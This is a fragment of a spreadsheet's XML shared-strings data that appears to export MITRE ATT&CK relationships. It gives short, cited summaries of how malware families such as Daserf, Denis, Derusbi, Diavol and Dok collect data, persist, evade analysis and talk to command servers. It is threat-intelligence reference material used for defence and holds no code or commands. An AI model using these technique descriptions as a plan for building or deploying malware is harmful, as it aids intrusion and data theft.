    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has been delivered via spearphishing emails that contain a malicious zip file.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--b87f6c02-8f95-4e40-a848-b6e3c069d703</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) encodes data using hexadecimal representation before sending it to the C2 server.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--827f9dc6-9dbd-4556-a817-efb9b115cac1</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can collect the OS version, system architecture, uptime, and computer name.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--ecb55914-837c-4600-a0f8-65d83d2d726b</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can identity the OS locale of a compromised host.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) has collected the username from a victim machine.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--f3d2f8a8-da3a-4635-90e5-95f6fee86a9c</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can collect the time zone information from the system.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--5113edc5-a4ee-4888-89b1-0c3353ea05da</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) uses HTTPS for command and control.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--94cbcde4-3323-41ba-948c-95f798d39a89</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can use `cmd.exe` to execute commands.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--8c677ccc-427f-43b8-a7b8-0c7a00001b9b</t>
  </si>
  <si>
    <t>[DarkWatchman](https://attack.mitre.org/software/S0673) can use WMI to execute commands.(Citation: Prevailion DarkWatchman 2021)</t>
  </si>
  <si>
    <t>relationship--aa60abd5-cc76-48b0-b39f-510317b18434</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) hides collected data in password-protected .rar archives.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--df6c39fa-9d95-45ee-911b-0ca2fc167086</t>
  </si>
  <si>
    <t>relationship--57527643-2aef-4171-b61a-665ab8ed991b</t>
  </si>
  <si>
    <t>Some [Daserf](https://attack.mitre.org/software/S0187) samples were signed with a stolen digital certificate.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--0f2e2727-ffe5-42ad-93fc-e856303ca684</t>
  </si>
  <si>
    <t>Analysis of [Daserf](https://attack.mitre.org/software/S0187) has shown that it regularly undergoes technical improvements to evade anti-virus detection.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e79c65f4-f9d2-4568-96a4-b6e00d3bad71</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can download remote files.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--24503815-4ac5-4d57-9e95-ebeb84e0c11b</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can log keystrokes.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d2bc1c1b-987b-4a1a-b488-8199f8113697</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) leverages [Mimikatz](https://attack.mitre.org/software/S0002) and [Windows Credential Editor](https://attack.mitre.org/software/S0005) to steal credentials.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--d6b4cd9a-a8bd-4c9f-b716-e29710f1e934</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.(Citation: Symantec Tick Apr 2016)</t>
  </si>
  <si>
    <t>relationship--d297b77f-9511-429a-b148-d7b8f0b5b502</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>relationship--92b34cc0-b059-4294-824f-bb92298f3ae6</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can take screenshots.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--6db82410-1fcf-483a-be5b-cf09c361b4eb</t>
  </si>
  <si>
    <t>A version of [Daserf](https://attack.mitre.org/software/S0187) uses the MPRESS packer.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>relationship--2f507d82-1df4-4c9c-804a-2e6060944142</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses custom base64 encoding to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--4abcf209-1dab-435b-a347-b8ff318ac5d8</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can use steganography to hide malicious code downloaded to the victim.(Citation: Trend Micro Daserf Nov 2017)</t>
  </si>
  <si>
    <t>relationship--a566127b-1d88-4b38-84dd-4686e2837399</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses RC4 encryption to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--ce9dbe5b-1b16-41d6-a7af-a2a1b33c4552</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) uses HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d6204645-83ff-4b26-a011-9b58bab2d597</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) can execute shell commands.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>relationship--03c08ef9-80c7-4f20-b197-ad44f702f2e0</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) leverages vulnerable versions of Flash to perform execution.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>relationship--b12c9b3f-bff1-4c73-bb86-a9665948405c</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) uses HTTP for communication with the C2 server.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>relationship--ee83de4f-1ebf-4da4-829e-052d2ac7cb3a</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) makes modifications to open-source scripts from GitHub and executes them on the victim’s machine.(Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>relationship--a49b638b-c180-4239-95f8-1601bd2d5295</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) compressed collected data using zlib.(Citation: Securelist Denis April 2017)</t>
  </si>
  <si>
    <t>relationship--6a6d57a7-8977-4928-8ef7-71d6c8a9fbfa</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has encoded its PowerShell commands in Base64.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--427f45bd-6518-4527-9ca2-37cf368947f5</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) exploits a security vulnerability to load a fake DLL and execute its code.(Citation: Cybereason Oceanlotus May 2017)</t>
  </si>
  <si>
    <t>relationship--e2b750e7-ad43-4e27-96a1-9bdb0e886a72</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--01eb6d18-bb7b-4e4a-b133-60407f40773b</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) will decrypt important strings used for C&amp;C communication.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--33d24077-13af-4e14-ba79-87ca145c5383</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has a command to delete files from the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--0439c736-6a78-4e89-9c55-6cc565b1b11f</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) has several commands to search directories for files.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--9c3faa58-eb39-407a-8233-8f43f53aa777</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL "msfte.dll" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--70ed2026-90af-4236-8180-2c095bbce0fe</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) deploys additional backdoors and hacking tools to the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--117ecbd3-b4cd-4ad2-a5f4-30ba79563406</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</si>
  <si>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</si>
  <si>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relationship--a51caaf6-3b9d-4953-9850-bf9217877644</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) obfuscates its code and encrypts the API names.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--f4881cea-8d6f-4cb6-ab86-5aab2379c695</t>
  </si>
  <si>
    <t xml:space="preserve">[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>relationship--ad825dd4-a26c-4468-8c11-91124ef9042d</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--1e285f16-a145-46f5-aad3-0ea33392f147</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) queries the Registry for keys and values.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--31028cf4-870e-490e-871e-ec55814dcef8</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) encodes the data sent to the server in Base64.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--56e55812-7622-4e84-96c6-6fc46dd2b541</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--081e43bc-3f9e-4110-a1c1-db7396e2ff59</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) collects OS information and the computer name from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--2910f5f5-38d6-418a-8566-23d31b93b124</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) uses &lt;code&gt;ipconfig&lt;/code&gt; to gather the IP address from the system.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--4cc3f3af-73f1-4f36-9e28-de4f8ecc3247</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim’s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--b47d8f5e-7c09-4f40-a5a8-ccce10a8363b</t>
  </si>
  <si>
    <t>[Denis](https://attack.mitre.org/software/S0354) can launch a remote shell to execute arbitrary commands on the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--f8d053fe-be2f-43fd-88d5-507e82ee4e1d</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing audio captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--b93d69f2-32a2-43a8-9b45-693d82a51c6b</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) injects itself into the secure shell (SSH) process.(Citation: Airbus Derusbi 2015)</t>
  </si>
  <si>
    <t>relationship--7fd4fe68-0f2a-485c-9b10-6847428ef5da</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) uses a backup communication method with an HTTP beacon.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>relationship--bd74b90d-ff9f-4ce3-96af-9b809fffc3da</t>
  </si>
  <si>
    <t>16 August 2019</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</si>
  <si>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</si>
  <si>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relationship--a2faf818-d21d-40a5-ad02-a3b1b2ee5d58</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of obtaining directory, file, and drive listings.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--b9fe8dd4-a3c9-4e58-9a74-937e4de677a8</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of logging keystrokes.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--062874d1-8ca9-400f-8367-670b9c7c3280</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) binds to a raw socket on a random source port between 31800 and 31900 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>relationship--c52eb151-c8c5-45f1-984b-d99a12ca05cf</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) has used unencrypted HTTP on port 443 for C2.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>relationship--a5bb3ddf-446a-42c4-b522-112ad643c678</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) collects current and parent process IDs.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--f017f6c0-96f4-46f1-905f-44e9950effbc</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of enumerating Registry keys and values.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--f023577a-e87f-4d0e-beef-575293a86153</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.(Citation: ThreatGeek Derusbi Converge)</t>
  </si>
  <si>
    <t>relationship--4f3473a4-f5f5-43d8-a4ec-589763695942</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of performing screen captures.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--c784f835-5d15-4fc6-a7ad-88d1a9050159</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) obfuscates C2 traffic with variable 4-byte XOR keys.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>relationship--a7cb0193-e854-4361-b1a1-fc4e68354c59</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>relationship--5d2ca571-9e66-4949-b3a1-978c47398b18</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</si>
  <si>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</si>
  <si>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relationship--af66e48f-3232-4f78-ad3e-5a404f7ae3a1</t>
  </si>
  <si>
    <t>The [Derusbi](https://attack.mitre.org/software/S0021) malware supports timestomping.(Citation: Novetta-Axiom)(Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>relationship--60137eb6-ed8c-41ce-bf75-6b45cdafe751</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--3268cdc0-7cee-4fe5-92cc-2c3cdc06712b</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is capable of capturing video.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--d953a664-5a8f-45a9-a3e6-819cb2cef2c7</t>
  </si>
  <si>
    <t>S0659</t>
  </si>
  <si>
    <t>Diavol</t>
  </si>
  <si>
    <t>malware--4e9bdf9a-4957-47f6-87b3-c76898d3f623</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can delete specified files from a targeted system.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--063b76d3-a002-44a1-aafa-d626008ee786</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with ".lock64". (Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--1e549632-405c-49fc-8594-3666ad22c681</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can attempt to stop security software.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--0aa3fda2-fd0b-415b-bada-1441a86caf03</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) has a command to traverse the files and directories in a given path.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>relationship--22a1c738-6d0f-4abd-b00c-ee0b37ba1db6</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can receive configuration updates and additional payloads including wscpy.exe from C2.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--d55ab651-738b-4bbc-9438-57fc76be8f52</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--ec0ea37c-cb59-4138-ac0a-ad401b37d5fe</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</si>
  <si>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</si>
  <si>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relationship--5410e6d1-1ec5-4cb9-9647-378f2266f774</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--b4ff0d25-3efb-4deb-898e-f25e18d4ae90</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) has a `ENMDSKS` command to enumerates available network shares.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>relationship--39aeaed2-f7ca-4fb6-8268-13e8e995461e</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has Base64 encoded the RSA public key used for encrypting files.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--ac6100b4-8a41-4353-8cbf-46e596d8d212</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has used `CreateToolhelp32Snapshot`, `Process32First`, and `Process32Next` API calls to enumerate the running processes in the system.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--31667cdd-1ac5-46f5-8dbd-9ebaf09f00a9</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) can use the ARP table to find remote hosts to scan.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>relationship--afe9286d-076f-49af-90f3-11ebbe82ad40</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can spread throughout a network via SMB prior to encryption.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--4dd44f72-a08e-4dac-9875-98690508ed08</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) will terminate services using the Service Control Manager (SCM) API.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>relationship--2035eee7-c1c3-4039-9fc0-af85b21a5e3f</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>relationship--65838f5f-0cc3-4e33-953a-11f1e5e7a20e</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can collect the computer name and OS version from the system.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--ccd4c695-2458-4eb0-ad9c-a19d411f7627</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can enumerate victims' local and external IPs when registering with C2.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--a63fc51d-0bec-49e8-8258-13ed157efbeb</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can collect the username from a compromised host.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--14e02371-ba11-459d-9662-188e85d3cf7c</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has used HTTP GET and POST requests for C2.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>relationship--2f3389a4-e0a6-4dc5-b5ff-38fd185e2821</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can download remote files.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--2a2b6def-5d29-41f7-b274-64bed33eb8ed</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--4563af55-57dc-44fc-b57b-76e2f10f3b9a</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encodes C2 traffic with base64.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--83a949a2-ed5d-4ae5-a45f-885e58a7d931</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encrypts C2 data with AES256 in ECB mode.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--36b2817e-5f07-4f70-927c-8e04b955d5a3</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--84e09e1a-b670-427e-8f35-1c472ac7a988</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can spawn remote shells.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--6ac167a2-e2b4-4b66-96a1-521468d5784c</t>
  </si>
  <si>
    <t>A [Dipsind](https://attack.mitre.org/software/S0200) variant registers as a Winlogon Event Notify DLL to establish persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--4536c335-5138-42d1-8f1e-63dee7cb17ab</t>
  </si>
  <si>
    <t>[Disco](https://attack.mitre.org/software/S1088) has achieved initial access and execution through content injection into DNS,  HTTP, and SMB replies to targeted hosts that redirect them to download malicious files.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--3f32468a-13b6-484b-b292-47702e470df1</t>
  </si>
  <si>
    <t>[Disco](https://attack.mitre.org/software/S1088) can use SMB to transfer files.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--e6bcb612-8e5c-493e-902e-0eb92a796a81</t>
  </si>
  <si>
    <t>[Disco](https://attack.mitre.org/software/S1088) can download files to targeted systems via SMB.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--128afec2-d9a5-4433-89d9-0cc65abf15bd</t>
  </si>
  <si>
    <t>[Disco](https://attack.mitre.org/software/S1088) has been executed through inducing user interaction with malicious .zip and .msi files.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--d96dd876-5752-4ea6-bb4b-ef92f60d57fe</t>
  </si>
  <si>
    <t>[Disco](https://attack.mitre.org/software/S1088) can create a scheduled task to run every minute for persistence.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--d61205cb-8b80-49c1-ac2c-76b0770d3e40</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021)  can direct queries to custom DNS servers and return C2 commands using TXT records.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--68ddf3bf-bf01-4de5-8b0e-e00db5a8ee7e</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can upload files from infected machines after receiving a command with `uploaddd` in the string.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--931e3af1-d38d-46eb-8c5d-d394510e2df1</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can exfiltrate collected data to its C2 server.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--185bd112-5e1f-4059-9e42-b8b80874e8f2</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can download files to compromised systems after receiving a command with the string `downloaddd`.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--607ae633-8e47-457a-9507-511d1e28f470</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) has lured victims into opening macro-enabled Word documents for execution.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--a0edf2ca-8f76-42ad-9525-1c0ae3948131</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can write itself to the Startup folder to gain persistence.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--86b7352f-8cba-4a5e-ac0a-c79697d0bd25</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can Base64 encode data sent to C2.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--0f41364e-e72b-4186-980f-a5a5a5d07395</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can use the Windows user name to create a unique identification for infected users and systems.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--8f9cee62-46ce-4ede-a478-6002962528a7</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can use `cmd.exe` for execution.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>relationship--7a270029-2292-42c3-86da-3381c5ca0178</t>
  </si>
  <si>
    <t>S0281</t>
  </si>
  <si>
    <t>Dok</t>
  </si>
  <si>
    <t>malware--f36b2598-515f-4345-84e5-5ccde253edbe</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>relationship--135df9c1-63cf-4323-a803-6d54a9ac8b22</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--79958f80-16ca-4287-b691-9c748d6baf66</t>
  </si>
  <si>
    <t xml:space="preserve">[Dok](https://attack.mitre.org/software/S0281) exfiltrates logs of its execution stored in the &lt;code&gt;/tmp&lt;/code&gt; folder over FTP using the &lt;code&gt;curl&lt;/code&gt; command.(Citation: hexed osx.dok analysis 2019) </t>
  </si>
  <si>
    <t>relationship--96667f6c-e625-4696-92b5-d65d142b3f43</t>
  </si>
  <si>
    <t>09 October 2021</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--a7744970-817e-43c6-89e4-86907ac20361</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</si>
  <si>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</si>
  <si>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relationship--97c225e6-64ad-42af-8cc4-4fb4deea39fc</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format &lt;code&gt;com.random.name.plist&lt;/code&gt;.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>relationship--4065a71f-ae1b-4dfc-9825-56d2af6d589c</t>
  </si>
  <si>
